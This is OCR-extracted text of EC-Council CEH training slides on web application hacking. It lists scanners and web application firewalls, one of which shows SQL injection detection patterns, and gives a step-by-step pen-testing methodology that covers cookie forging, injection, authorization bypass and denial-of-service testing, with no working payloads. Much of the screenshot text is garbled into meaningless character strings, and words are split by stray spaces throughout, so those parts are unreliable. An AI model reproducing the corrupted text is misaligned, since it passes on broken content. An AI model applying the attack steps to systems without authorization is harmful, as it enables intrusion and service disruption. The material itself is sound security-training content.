h ttp ://w w w . rawlogic. com
skipfish
| ___ j ^ http://code.google.com
W hi
X5s
h ttp ://w w w . cas aba. com
f t .
'
SPIKE Proxy
h ttp ://w w w . im munity sec. com
Ratproxy
EC-C0UnCil
R a t p r o x v a v a ila b le a t h t t p : / / c o d e . g o o g l e . c o m
EC-C0UnCil
C EH
ip i
Syhunt Hybrid
h ttp ://w w w .syh u n t. com
WebW atchBot
h ttp ://w w w . exclamations oft. com
Exploit-Me
http:/'/labs, securitycompass.com
f -r K
!\
KeepNI
h ttp ://w w w . keepni. com
( P"
WSDigger
h ttp ://w w w . mcafee. com
Grabber
http ://rg a uch e r. info
Arachni
http://arachni-scanner. com
xsss
h ttp ://w w w . s yen. de
Vega
h ttp ://w w w . s ubgraph. com
EC-C0UnCil
C EH
Urt1fw4 ilhiul lUtbM
d tDefender
i 9 SQL Infection
ype
[ f l B j f f r r0 . e f b a 2 1S Q Llr!j*c t> c r
LaercHhed [U i CT0B-5WSOW Snc C U ,,7 )Patfi s.esal P^ob': L tl Rno(e camand txec H I if?! Irwctcn IU vmdow* Drcrtorm ar H J .2) *M l '.+m1
ij ij fg tE n c o tln Q
v .
so l r t -
C 7 ) u J ) e A ? &C
D Q Q
w SQL Comments
Q
Ethical Hacking and C ounterm easures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is S trictly Prohibited.
-Iffl X l
d t D e f e n d e r
O license
I B I _______
^ d o t O t f e n d e r( 3 2 9d a y el e H )
FI b ; E/cnt Vic no (locd)
I dn I n t e r n e tJ p f o r r n a t o nS e n / i c t c(
Ac s c b a ls # t1 !rg s
0 { f Default Security FYofile (Protec J ] sewer Ma?icrc 1 1 SQL Injacfion Upload Folders 0 Patterns Choose which type of SQL Injection attact-s to nte'ccpt 0 lAiWte#*t (Permitted A c<
0 L s ? Pcnad 0 E n c o d i n g 0 Buffer O v e r f l o w B I G SS Q LI n j e c t i o n
User Defired t j Best Practices 0 Cross-Site Sanptrg 0 Cookie Manipulation 0 f e Pah Traversal
1 7 Suspect Single Quote (Safe) Pattern = Pattern F Classic SQL C o m m e n t , SQL Comments
Q D D D D D 0
0 62 P r o b n c
Hi f e Rerote cormard Exec 0 Code Inaction ra LZ Windows Drectorfes an 0 XM. Schema 0 LZ XPoth Injection 0 XPath Crccs Ste Scroa Soroturea (Us# Default) Q Athena =TP Ste (Ltec Default)
1 7 Union Select Statement 1 7 Select Version Statement 1 7 SQL CHAR Type 1 7 SQL SYS C o m ma n d s 1 7 IS_SRVROLEMEMBER followed by ( 1 7 M S SQL Specific SQL Injection
EC-C0UnCil
c EH
(rtifwd ItkMJl lUckM
ServerDefender VP Web application firewall is designed to provide security against web attacks
port80
l-ojt <'adaton Buffer Overflow | Resources | Me*cds JU3 | RicUptoa-s | ectpm ts Common"Pireats SQ L Injection &Z|aoACfttJ9teStTplng(>SS) Gcnenc ]ru t wrrtiratwn MribicdKTWl_______________ v_
O i N o n e
$l**Mun 0 ^. II. 1 2 ,H3 1 ,1 2 7 ,1 7 5 2 2 3 ,2 5 $ ) Mnmum C) Extended (>,
Q i
S o u rc e : h t t p : / / w w w . p o r t 8 0 s o f t w a r e . c o m
d e f a c e m e n t , f ile a lt e r a t i o n s , a n d d e le t io n s .
EC-C0UnCil
s e r v e r d e fe n d e r V P
W E B APPLICATION FIREWALL
p o rt8 0
Protection for Default Web Site is O N
4 : Sit* || Status j b i Resporse Mgmt / ^ \ Session Mgmt
O FF LO GO N LY O O N
E Mgmt Admir Options
Mgmt
Input V afc d a tio n B irfier O verflow J R esources | M ethods | U R L s |F ile U ploads ] E xceptions
Generc Input S an itizatio n O None () [0-9, 11, 12, 14-31, 127,175-223, 255]
Apply
serverdefender VP
W E B APPLICATION FIREWALL g
p o r t8 0
Protection for Gauntlet is O N
Enforcement Level |G e n e r c P iiA c S ite *] 1 2 3 4 5 Sh ow Details
O FF LOG ONLY 0 O N
Site Status | Blocked IP s | Aierbng | Reporting | Refresh Currently Blocked IPs Total Error Count 723 LogViewer Total | 7 404 |
ServerDef enderVP Statistics Total HTTP Requests 26719 Error Statistics S*e 1 Default Web. Gauntlet Administration Assets Total Sessions Created 752
SQL I
XSS I
Input I
Cookie I
Other | 3
Expert View
OK
Cancel
Apply
EC-C0UnCil
Radware's AppWall
n ss^l 1 j
r- '
ThreatSentry
h ttp ://w w w . privacy ware, com
I3 H
QualysGuard WAF
h ttp ://w w w . quatys. com
ThreatRadar
h ttp ://w w w . imperva. com
Trustwave WebDefend
https ://w w w . trus t wave, com
ModSecurity
h ttp ://w w w . modsecurity. org
W e b
A p p lic a tio n
F ir e w a lls
k n o w n a n d u n k n o w n a tta c k s . T h e y p r e v e n t d a ta t h e f t a n d m a n i p u l a t i o n o f s e n s itiv e c o r p o r a t e a n d c u s t o m e r i n f o r m a t i o n . C o m m o n l y u sed w e b a p p li c a t i o n f i r e w a l l s a re lis te d as f o l lo w s : R a d w a r e 's A p p W a l l a v a ila b le a t h t t p : / / w w w . r a d w a r e . c o m T h r e a t S e n t r y a v a ila b le a t h t t p : / / w w w . p r i v a c y w a r e . c o m Q u a ly s G u a r d W A F a v a ila b le a t h t t p : / / w w w . q u a l y s . c o m T h r e a t R a d a r a v a ila b le a t h t t p : / / w w w . i m p e r v a . c o m M o d S e c u r i t y a v a ila b le a t h t t p : / / w w w . m o d s e c u r i t y . o r g B a r ra c u d a W e b A p p l i c a t i o n F ire w a ll a v a ila b le a t h t t p s : / / w w w . b a r r a c u d a n e t w o r k s . c o m S t in g r a y A p p l i c a t i o n F ire w a ll a v a ila b le a t h ttp ://w w w .r iv e r b e d .c o m IB M S e c u r ity A p p S c a n a v a ila b le a t h t t p : / / w w w - 0 1 . i b m . c o m T r u s t w a v e W e b D e f e n d a v a ila b le a t h t t p s : / / w w w . t r u s t w a v e . c o m C y b e r o a m 's W e b A p p l i c a t i o n F ire w a ll a v a ila b le a t h t t p : / / w w w . c y b e r o a m . c o m
EC-C0UnCil
M o d u le F lo w
C EH
W e b A p p C oncepts
f a
S ecurity Tools
Q Q Q
W e b A p p T h rea ts
**S
C o u n term ea su re s
M o d u le
F lo w
m a y also b e c o m e a v i c t i m
W e b A p p Pen T e s t in g
W e b A p p C oncepts
S e cu rity Tools
W e b A p p T h re a ts
lM
C o u n te rm e a s u re s
^ 3
H acking M e th o d o lo g y
EC-C0UnCil
W eb applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
(rtifwtf itfciul Nm Im
W eb application pen testing is used to identify, analyze, and report vu ln erabilities such as input validation,
The best w ay to perform penetration testing is to conduct a series of m ethodical and repeatable te sts, and to work through all of the different application vulnerabilities
p --------1 h ttp ./
smm
!
Id e n tific a tio n o f P o rts Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses
j
Rem ediation of V u lnerab ilities To retest the solution against vulnerability to ensure that it is completely secure
V e r ific a tio n o f V u ln e ra b ilitie s To exploit the vulnerability in order to test and fix the issue
1ur
associated risks. As a pen tester, you should test your web application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities.
Web application pen testing helps in: Identification of Ports: Scan the ports to identify the associated running services and
analyze them through automated or manual tests to find weaknesses.
Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the
issue.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
_ _
CEH
Inform ation G athering v Configuration M anag em ent Testing 9 A uth en ticatio n Testing V Session M anag em ent Testing
W e b Services Testing
Business Logic Testing ----------- * ----------------------- -----------Data Validation Testing -----------* ------------
A JA X Testing
Denial-of-Service Testing
W e b A p p l i c a t i o n P e n T e s t i n g ( C o n t d)
The general steps that you need to follow to conduct web application penetration test are listed as follows. In a future section, each step is explained in detail.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
ST A RT
A llo w e d an d d is a llo w e d d ire cto ries
CEH
Retrieve and analyze robots.txt file using tools such as GNU Wget Use the advanced "site:" search operator and then click "Cached" to perform search engine reconnaissance Identify application entry points using tools such as Webscarab, Burp proxy, OWASP ZAP, TamperlE (for Internet Explorer), or Tamper Data (for Firefox) To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing) and perform vulnerability scanning using tools such as Nmap (Port Scanner) and Nessus Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, querying search engines (googling)
V
Perform search engine reconnaissance
Issu es o f w e b app lica tion stru ctu re, erro r pages p ro du ced
C o okie in fo rm a tio n , 300 > HTTP and 400 statu s codes, 500 in te rn a l s e rv e r errors
Copyrigh t b y
In fo rm a tio n G a th e rin g
Let's get into detail and discuss each web application test step thoroughly. The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
guessing), and perform vulnerability scanning using tools such as Nmap (Port Scanner) and Nessus. Check for web applications, old versions of files, or artifacts. Sometimes the old versions of files may give useful information that attackers can use to launch attacks on the web application.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
r gu
(lllfwtf | ltkl4l NMhM
.....
Analyze error codes by requesting invalid pages and utilize alternate request methods (POST/PUT/Other) in order to collect confidential information from the server
Examine the source code from the accessible pages of the application frontend
Test for recognized file types/extensions/directories by requesting common file extensions such as .ASP, .HTM, .PHP, .EXE, and watch for any unusual output or error codes Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap
......
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
c EH
1
&
V
Perform infrastructure configuration management testing
w Identify th e ports associated to SSL/TLS w rapped services using N m ap and N essus e P erform netw ork scanning and analyze th e w eb server banner Test th e application configuration m a n a g em en t using CGI s c a n n e rs and reviewing th e co n te n ts of th e w eb server, application server, com m ents, configuration and logs Use vulnerability s c a n n e rs , sp id erin g an d m irroring to o ls , sea rch e n g in es queries or perform m anual inspection to te s t for file extensions handling
t Review source code, e n u m e ra te application pages and functionality & P erform d irec to ry an d file e n u m e ra tio n , reviewing server an d application docum entation, etc . to te s t for infrastructure and application adm in interfaces Review OPTIONS HTTP m ethod using N etcat or Telnet
Information in the source code, log files, and default error codes
<
... >
Once you gather information about the web application environment, test the
configuration management. It is important to test the configuration management because improper configuration may allow unauthorized users to break into the web application.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Authentication Testing
START
C EH
Try to reset passwords by guessing, social engineering, or cracking secret questions, if used. Check if "remember my password" mechanism is implemented by checking the HTML code of the login page. Check if it is possible to "reuse" a session after logout. Also check if the application automatically logs out a user when that user has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache. Authentication vulnerabilities Identify all parameters that are sent in addition to the decoded CAPTCHA value from the client to the server and try to send an old decoded CAPTCHA value with an old CAPTCHA ID of an old session ID
Authentication vulnerabilities
V
Test for CAPTCHA
W Check if users hold a hardware device of some kind in addition to the password. Check if hardware device communicatesdirectlyand independently with the authentication infrastructure using an additional communication channel. Attempt to force a race condition, make multiple simultaneous requests while observing the outcome for unexpected behavior. Perform code review.
Race conditions
H jjjjg A u t h e n t i c a t i o n T e s t i n g
You need to perform the following steps to carry out authentication testing:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Collect sufficient number of cookie samples, analyze the cookie generation algorithm and forge a valid cookie in order to perform the attack Test for cookie attributes using intercepting proxies such as Webscarab, Burp proxy, OWASP ZAP, or traffic intercepting browser plug-in's such as "TamperlE"(for IE) and "Tamper Data"(for Fi refox) To test for session fixation, make a request to the site to be tested and analyze vulnerabilities using the WebScarab tool Test for exposed session variables by inspecting encryption & reuse of session token, proxies & caching , GET & POST, and transport vulnerabilities Examine the URLs in the restricted area to test for CSRF
V
Test for CSRF (Cross Site Request Forgery)
^ C o m prom ises e n d u s er data an d o p e ra tio n o r e n tire w e b ap p lica tio n
pySj
S essio n M a n a g e m e n t T e stin g
After testing the configuration management, test how the application manages the
session. The following are the steps to conduct session management pen testing:
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
A uthorization Testing
START y Can gain access to reserved information
C EH
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application e Test for bypassing authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role
Test for role/privilege manipulation Copyright by E C G a u a c t l .All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
C EH
(rtifwtf ttfciui Nm Im
Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report and attem pt to exploit it. Use tools such as OWASP CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy Analyze HTML code, test for Stored XSS, leverageStoredX SS,verifyifthefile upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, B urp,and XSS Assistant
Perform source code analysis to identify JavaScript coding errors Analyze SWF files using tools such as SWFIntruder, Decompiler Flare, Compiler MTASC, Disassembler-Flasm,Swfmil I, and Debugger Version of Flash Plugi n/Player Perform Standard SQL Injection Testing, Union Query SQL Injection Testing, Blind SQL Injection Testing, and S tored Procedure Injection using tools suchas OWASP SQUX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. Use a trial and erro r approach by i n s e r t i n g ' I a nd the other characters in order to check the appl icati on for errors. Use the tool Softerra LDAP Browser
Cookie information
Database information
<......
___^
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
check the application for errors. Use the tool Softerra LDAP Browser. The LDAP injection may
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails Try to insert XML metacharacters Information about XML structure Find if the web server actually supports SSI directives using tools such as W eb Proxy Burp Suite, OWASP ZAP, WebScarab, String searcher: grep Inject XPath code and interfere with the query result Identify vulnerable parameters. Access confidential information Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection
D a t a V a l i d a t i o n T e s t i n g ( C o n t d)
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
Inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities Perform manual code analysis and craft malicious HTTP requests using | to test for
Perform OS commanding
...y
OS command injection attacks Perform manual and automated code analysis using tools such as OllyDbg to detect buffer overflow condition Upload a file that exploits a component in the local user workstation, when viewed or downloaded by the user, perform XSS, and SQL injection attack Identify all user controlled input that influences one or more headers in the response, and check whether he or she can successfully inject a CR+LF sequence in it
y
Perfo rm buffer o ve rflo w testin g ^ Stack and heap memory information, application control flow
y
Perform incubated vu ln erab ility testing ' Server configuration and input validation schemes
y
Test for HTTP splitting/smuggling ...- y Cookies, and HTTP redirect information
D a t a V a l i d a t i o n T e s t i n g ( C o n t d)
To perform code injection testing, inject code (a malicious URL) and perform source code analysis to discover code injection vulnerabilities. It gives information about input validation errors.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
D enialofService Testing
d
C EH
Application information
Craft a query that will not return a result and includes several wildcards. Test manually or employ a fuzzer to automate the process
Test that an account does indeed lock after a certain number of failed logins. Find places where the application discloses the difference between valid and invalid logins
Perform a manual source code analysis and submit a range of inputs with varying lengths to the application
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, then see if the server continues to respond
D e n i a l o fS e r v i c e T e s t i n g
To check your web application against DoS attacks, follow these steps :
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond maximum limit.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
D enialofService Testing
(C o n td)
6 Logical errors in an application
CEH
Enter an extremely large number in the input field that is used by application as a loop counter
Use a script to automatically submit an extremely long value to the server in the request that is being logged W rite user provided data to disk ,w. Local disks exhaustion Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages Test for proper release of resources Programming flaws Create a script to automate the creation of many new sessions with the server and run the request that is suspected of caching the data within the session for each one V Test for storing too much data in session Session management errors
D e n i a l o fS e r v i c e T e s t i n g ( C o n t d)
Step5: Test for user input as a loop counter
Test for user input as a loop counter and enter an extremely large number in the input field that is used by application as a loop counter. If the application fails to exhibit its predefined manner, it means that application contains a logical error.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
CEH
w To gather W S information use tools such as wsCh ess, Soaplite, CURL, Peri, etc. and online tools such as UDDI Brow ser, W SIn d ex , and Xm ethods Use tools such as W SD igger, W e b Sca ra b , and Found stone to autom ate web services security testing Pass malformed SOAP messages to XM L parser or attach a very large string to the message. Use W Sd igger to perform autom ated X M L structure testing e Use w eb application vulnerability scanners such as W eb Sca ra b to test XM L content-level vulnerabilities Pass malicious con ten t on th e HTTP GET strings th at invoke XM L applications Craft an X M L docum ent (SOAP message) to send to a w eb service that contains malware as an attachm ent to check if XM L document has SOAP attachm ent vulnerability Attem pt to resend a sniffed XM L message using W iresh ark and W eb Scarab
Information about SQL, XPath, buffer overflow, and command injection vulnerabilities
W eb S e rv ic e s T e s tin g
Stepl: Gather W S information
Gather W S information using tools such as Net Square wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
AJAX Testing
AJAX application call endpoints
CEH
y
Parse the HTM L and JavaScrip t files XMLHttpRequest object, JavaScript files, AJAX frameworks
............. v
Enum erate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax Observe HTM L and JavaScript files to find URLs of additional application surface exposure
Use proxies and sniffers to observe traffic generated by user-viewable pages and the background asynchronous traffic to the A JAX endpoints in order to determ ine the form at and destination of the requests
AJAX T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Urtiffetf
CEH
itkNjI lUilwt
With increasing dependence, web applications and web services are increasingly being targeted by various attacks that results in huge revenue loss for the organizations Some of the m ajor web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security m isconfiguration, broken session m anagem ent, etc. Input validation flaws are a m ajor concern as attackers can exploit these flaws to perform or create a base for m ost of the web application attacks, includingcross-site scripting, buffer overflow, injection attacks, etc. It is also observed that m ost of the vulnerabilities result because of m isconfiguration and not following standard security practices Com m on counterm easures for web application security include secure application developm ent, input validation, creating and following security best practices, using WAF Firewall/IDS and perform ing regular auditing of network usingweb application security tools ----
M o d u le S u m m a ry
Q Organizations today rely heavily on web applications and W eb 2.0 technologies to support key business processes and improve performance. With increasing dependence, web applications and web services are increasingly being targeted by various attacks that results in huge revenue loss for the organizations. Some of the major web application vulnerabilities include injection flaws, cross-site scripting (XSS), SQL injection, security misconfiguration, broken session management, etc. e Input validation flaws are a major concern as attackers can exploit these flaws to perform or create a base for most of the web application attacks, including cross-site scripting, buffer overflow, injection attacks, etc. e It is also observed that most of the vulnerabilities result because of misconfiguration and not following standard security practices. Common countermeasures for web application security include secure application development, input validation, creating and following security best practices, using WAF firewall/IDS, and performing regular auditing of network using web application security tools.
Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.